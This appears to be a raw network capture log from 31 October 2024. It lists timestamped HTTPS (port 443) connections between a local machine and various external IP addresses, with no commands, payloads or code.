                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.740570068 CET44349883174.137.133.49192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.740618944 CET49883443192.168.2.4174.137.133.49
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.747520924 CET49883443192.168.2.4174.137.133.49
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.747520924 CET49883443192.168.2.4174.137.133.49
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.747541904 CET44349883174.137.133.49192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.747596025 CET49883443192.168.2.4174.137.133.49
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.811007977 CET44349890178.250.1.9192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.811074972 CET44349890178.250.1.9192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.811139107 CET49890443192.168.2.4178.250.1.9
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.812267065 CET49890443192.168.2.4178.250.1.9
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.812283993 CET44349890178.250.1.9192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.817122936 CET4434989854.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.817193985 CET4434989854.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.817250967 CET49898443192.168.2.454.170.20.205
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.819015980 CET4434989635.204.158.49192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.819108009 CET4434989635.204.158.49192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.819190025 CET49896443192.168.2.435.204.158.49
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.819814920 CET4434989135.214.168.80192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.821059942 CET4434990135.214.168.80192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.822696924 CET49898443192.168.2.454.170.20.205
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.822715044 CET4434989854.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.823329926 CET4434988952.16.92.15192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.823396921 CET49889443192.168.2.452.16.92.15
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.823641062 CET49896443192.168.2.435.204.158.49
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.823647022 CET4434989635.204.158.49192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.824114084 CET49891443192.168.2.435.214.168.80
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.824141979 CET4434989135.214.168.80192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.824314117 CET4434989135.214.168.80192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.824317932 CET49891443192.168.2.435.214.168.80
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.824470997 CET49891443192.168.2.435.214.168.80
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.824959993 CET49901443192.168.2.435.214.168.80
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.824992895 CET4434990135.214.168.80192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.825061083 CET49901443192.168.2.435.214.168.80
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.826946974 CET44349893172.217.18.4192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.827672005 CET49924443192.168.2.474.119.117.16
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.827687979 CET4434992474.119.117.16192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.827991009 CET49924443192.168.2.474.119.117.16
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.831724882 CET49925443192.168.2.454.170.20.205
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.831769943 CET4434992554.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.831837893 CET49925443192.168.2.454.170.20.205
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.832437992 CET49924443192.168.2.474.119.117.16
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.832456112 CET4434992474.119.117.16192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.833199024 CET49925443192.168.2.454.170.20.205
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.833225965 CET4434992554.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.835335970 CET4434990835.190.0.66192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.835400105 CET49908443192.168.2.435.190.0.66
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.836628914 CET49893443192.168.2.4172.217.18.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.836668015 CET44349893172.217.18.4192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.836725950 CET49893443192.168.2.4172.217.18.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.857712030 CET4434988952.16.92.15192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.857755899 CET4434988952.16.92.15192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.857826948 CET49889443192.168.2.452.16.92.15
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.860621929 CET49889443192.168.2.452.16.92.15
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.860630035 CET4434988952.16.92.15192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.860990047 CET4434990951.89.9.252192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.863194942 CET49909443192.168.2.451.89.9.252
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.863204956 CET4434990951.89.9.252192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.864451885 CET4434990951.89.9.252192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.864530087 CET49909443192.168.2.451.89.9.252
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.866612911 CET44349915142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.868645906 CET49915443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.868657112 CET44349915142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.869054079 CET44349915142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.869889975 CET49915443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.869966984 CET44349915142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.871192932 CET49915443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.874249935 CET49909443192.168.2.451.89.9.252
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.874351978 CET4434990951.89.9.252192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.874471903 CET49909443192.168.2.451.89.9.252
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.874480009 CET4434990951.89.9.252192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.874722004 CET4434990835.190.0.66192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.875978947 CET4434990835.190.0.66192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.876023054 CET49908443192.168.2.435.190.0.66
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.878504992 CET4434988420.157.217.118192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.878565073 CET4434988420.157.217.118192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.878804922 CET49884443192.168.2.420.157.217.118
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.879029989 CET49908443192.168.2.435.190.0.66
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.879048109 CET4434990835.190.0.66192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.879055977 CET49908443192.168.2.435.190.0.66
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.879091024 CET49908443192.168.2.435.190.0.66
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.883681059 CET49884443192.168.2.420.157.217.118
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.883691072 CET4434988420.157.217.118192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.887156010 CET44349914142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.887350082 CET49914443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.887376070 CET44349914142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.887753963 CET44349914142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.888040066 CET49914443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.888103008 CET44349914142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.888158083 CET49914443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.915333033 CET44349915142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.931333065 CET44349914142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.955916882 CET49909443192.168.2.451.89.9.252
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.252511024 CET4434990951.89.9.252192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.252567053 CET4434990951.89.9.252192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.252613068 CET49909443192.168.2.451.89.9.252
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.253365993 CET44349914142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.254091978 CET44349915142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.254132032 CET44349915142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.254146099 CET49915443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.254153967 CET44349915142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.254286051 CET49915443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.254292011 CET44349915142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.265173912 CET49909443192.168.2.451.89.9.252
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.265201092 CET4434990951.89.9.252192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.270176888 CET49915443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.270221949 CET44349915142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.270267010 CET49915443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.273536921 CET44349914142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.273614883 CET49914443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.282686949 CET49914443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.282700062 CET44349914142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.305013895 CET49937443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.305033922 CET44349937142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.305272102 CET49937443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.305855036 CET49937443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.305866003 CET44349937142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.444438934 CET4434992054.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.451626062 CET49920443192.168.2.454.170.20.205
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.451649904 CET4434992054.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.452030897 CET4434992054.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.455879927 CET49920443192.168.2.454.170.20.205
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.455959082 CET4434992054.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.458134890 CET49920443192.168.2.454.170.20.205
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.503343105 CET4434992054.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.546509981 CET4434992335.71.131.137192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.546839952 CET49923443192.168.2.435.71.131.137
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.546849012 CET4434992335.71.131.137192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.548049927 CET4434992335.71.131.137192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.548408031 CET49923443192.168.2.435.71.131.137
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.548566103 CET49923443192.168.2.435.71.131.137
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.548574924 CET4434992335.71.131.137192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.564834118 CET4434992474.119.117.16192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.565237999 CET49924443192.168.2.474.119.117.16
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.565248013 CET4434992474.119.117.16192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.566277027 CET4434992474.119.117.16192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.566330910 CET49924443192.168.2.474.119.117.16
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.570269108 CET49924443192.168.2.474.119.117.16
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.570339918 CET4434992474.119.117.16192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.570436954 CET49924443192.168.2.474.119.117.16
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.591325045 CET4434992335.71.131.137192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.611358881 CET4434992474.119.117.16192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.676326990 CET4434992554.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.678884983 CET49925443192.168.2.454.170.20.205
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.678905964 CET4434992554.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.679256916 CET4434992554.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.680840969 CET49925443192.168.2.454.170.20.205
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.680912018 CET4434992554.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.681010008 CET49925443192.168.2.454.170.20.205
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.698906898 CET4434992054.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.698985100 CET4434992054.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.699064016 CET49920443192.168.2.454.170.20.205
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.699356079 CET49920443192.168.2.454.170.20.205
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.699372053 CET4434992054.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.699381113 CET49920443192.168.2.454.170.20.205
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.699541092 CET49920443192.168.2.454.170.20.205
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.704802036 CET4434992335.71.131.137192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.704871893 CET49923443192.168.2.435.71.131.137
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.720135927 CET49923443192.168.2.435.71.131.137
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.720143080 CET4434992335.71.131.137192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.723334074 CET4434992554.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.735959053 CET4434992474.119.117.16192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.739012957 CET49924443192.168.2.474.119.117.16
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.758707047 CET49924443192.168.2.474.119.117.16
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.758714914 CET4434992474.119.117.16192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.161386967 CET4434992554.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.161485910 CET4434992554.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.161612034 CET49925443192.168.2.454.170.20.205
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.171116114 CET44349937142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.171329021 CET49937443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.171350956 CET44349937142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.171752930 CET44349937142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.171804905 CET49937443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.172507048 CET44349937142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.172559023 CET49937443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.172827959 CET49937443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.172888994 CET44349937142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.172980070 CET49937443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.172987938 CET44349937142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.176532984 CET49925443192.168.2.454.170.20.205
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.176556110 CET4434992554.170.20.205192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.243068933 CET49937443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.460777998 CET44349937142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.460834980 CET44349937142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.460896969 CET44349937142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.460942984 CET49937443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.460964918 CET44349937142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.460993052 CET49937443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.584230900 CET44349937142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.584284067 CET49937443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.588040113 CET49937443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.588053942 CET44349937142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.598922014 CET49955443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.598958969 CET44349955142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.599119902 CET49955443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.600166082 CET49956443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.600219965 CET44349956142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.600620031 CET49956443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.602196932 CET49956443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.602216005 CET44349956142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.602441072 CET49955443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:37.602461100 CET44349955142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.453620911 CET44349955142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.453664064 CET44349956142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.472769022 CET49955443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.472786903 CET44349955142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.473282099 CET44349955142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.473627090 CET49956443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.473649025 CET44349956142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.474342108 CET44349956142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.475244045 CET49955443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.475349903 CET44349955142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.477612019 CET49956443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.477731943 CET44349956142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.478748083 CET49955443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.478945017 CET49956443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.519342899 CET44349955142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.523335934 CET44349956142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.642309904 CET49969443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.642362118 CET44349969160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.642432928 CET49969443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.643007040 CET49969443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.643022060 CET44349969160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.649683952 CET49970443192.168.2.4216.58.206.34
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.649715900 CET44349970216.58.206.34192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.649775982 CET49970443192.168.2.4216.58.206.34
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.649979115 CET49970443192.168.2.4216.58.206.34
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.649996996 CET44349970216.58.206.34192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.738593102 CET44349956142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.740144014 CET44349955142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.740205050 CET49955443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.740850925 CET49955443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.740890980 CET44349955142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.740957022 CET49955443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.813440084 CET49956443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.813458920 CET44349956142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.814099073 CET49956443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.814544916 CET44349956142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.814608097 CET49956443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:39.275830984 CET49975443192.168.2.4142.250.186.174
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:39.275871038 CET44349975142.250.186.174192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:39.275937080 CET49975443192.168.2.4142.250.186.174
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:39.276315928 CET49975443192.168.2.4142.250.186.174
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:39.276328087 CET44349975142.250.186.174192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:39.493355036 CET44349969160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:39.493544102 CET49969443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:39.493571043 CET44349969160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:39.497198105 CET44349969160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:39.497256041 CET49969443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:39.497611046 CET49969443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:39.497816086 CET44349969160.153.155.187192.168.2.4
